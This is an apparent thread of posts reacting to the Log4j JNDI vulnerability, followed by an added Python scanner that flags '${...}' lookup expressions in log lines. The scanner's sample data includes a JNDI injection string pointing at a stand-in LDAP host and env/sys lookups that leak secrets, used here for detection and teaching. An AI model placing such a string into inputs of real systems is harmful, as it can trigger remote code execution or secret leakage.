reading about the log4j vulnerability, and... why. why does a logging system have a thing that fetches a url and executes the response. why does this exist
I'd been assuming it must be some sort of memory or privilege exploit (cue people going "see even memory safe languages are bad") but it's completely unrelated to memory. it's that log4j uses jndi which has an extremely dangerous feature built into it
strings are so bad. you know one thing that's really good about rust? signal vs formatting is parsed out of println! _at compile time_ so you can't confuse it by putting control sequences in data
I'm used to thinking "you might need to shell-escape log data to get rid of formatting codes" but log4j just _downloads urls and executes the response_ as a deliberate feature?
It also interprets them in the strings being passed as parameters rather than only the main format string itself. It's not even avoidable by avoiding passing attacker controlled format strings. They're trying to put a bandaid on a fundamentally broken and horrifying design.
I am honestly amazed that each time I read something new about this issue, it somehow makes it worse.
Saw that here and confirmed it:
news.ycombinator.com/item?id=295063
It's unfortunately par for the course for anything with the Apache brand.
It's still problematic even with the vulnerability fixed because you can leak sensitive variables to logs which aren't supposed to end up in the logs.
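An added example, not code from the thread or from Log4j itself, illustrating the two defender-side concerns raised above: lookups hiding inside logged parameters (the `${jndi:...}` remote lookup) and local lookups such as `${env:...}` that can leak environment secrets into logs even after the remote-lookup bug is fixed. The sample log lines are constructed; the `neutralize` step is an assumed pre-logging mitigation for untrusted input, not a Log4j API, and the prefix sets are a deliberately small illustration rather than a complete list of Log4j lookup types.

```python
# Defensive scanner for Log4j-style "${prefix:...}" lookup expressions in log text.
# Added example; sample lines are constructed, not taken from the thread.

# Constructed sample log lines (hypothetical, for demonstration only).
SAMPLE_LINES = [
    "GET /index.html 200 ua=Mozilla/5.0",
    "login failed for user=${jndi:ldap://example.invalid/a}",
    "config dump path=${env:HOME} user=${sys:user.name}",
    "nested ${upper:${lower:hello}} text",
]

# Lookup prefixes we treat as remote (the bug discussed) or as local-data leaks.
# Illustrative subset, not a complete list of Log4j lookup types.
REMOTE_PREFIXES = {"jndi"}
LEAKY_PREFIXES = {"env", "sys"}


def find_lookups(line):
    """Return every balanced "${...}" expression in line, outermost first.

    A simple stack scan: each "${" pushes its start offset, each "}" pops one
    and records the enclosed expression. Nested lookups are returned both as
    part of their enclosing expression and on their own, so an inner "${jndi:..}"
    wrapped in another lookup is still reported.
    """
    found = []
    stack = []
    i = 0
    while i < len(line):
        if line.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if line[i] == "}" and stack:
            start = stack.pop()
            found.append((start, line[start:i + 1]))
        i += 1
    found.sort()  # order by start offset: outer expressions before inner ones
    return [expr for _, expr in found]


def lookup_prefix(expr):
    """'${jndi:ldap://x}' -> 'jndi'; returns '' when the body has no 'prefix:' part."""
    body = expr[2:-1]
    if ":" not in body:
        return ""
    return body.split(":", 1)[0].strip().lower()


def classify_line(line):
    """Classify one log line as 'remote', 'leak', 'lookup' or 'clean'.

    Returns (verdict, lookups). 'remote' wins over 'leak' because a JNDI lookup
    is the more severe finding; 'lookup' means some other lookup syntax is
    present and worth a look even if it is not in the two sets above.
    """
    exprs = find_lookups(line)
    prefixes = {lookup_prefix(e) for e in exprs}
    if prefixes & REMOTE_PREFIXES:
        return "remote", exprs
    if prefixes & LEAKY_PREFIXES:
        return "leak", exprs
    if exprs:
        return "lookup", exprs
    return "clean", exprs


def neutralize(untrusted):
    """Assumed pre-logging mitigation (not a Log4j API): break the "${" opener in
    attacker-controlled data so the logger's lookup parser cannot see a lookup.
    The replacement keeps the text readable for a human reviewing the log."""
    return untrusted.replace("${", "$[")


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        verdict, exprs = classify_line(line)
        print(f"{verdict:7} {exprs} <- {line}")
    print("after neutralize:", neutralize("user=${jndi:ldap://example.invalid/a}"))
```

The scan is intentionally on raw text rather than on the logger's parsed format string, because, as the thread notes, the lookups are interpreted inside parameter values too; anything that reaches the logger as data is in scope.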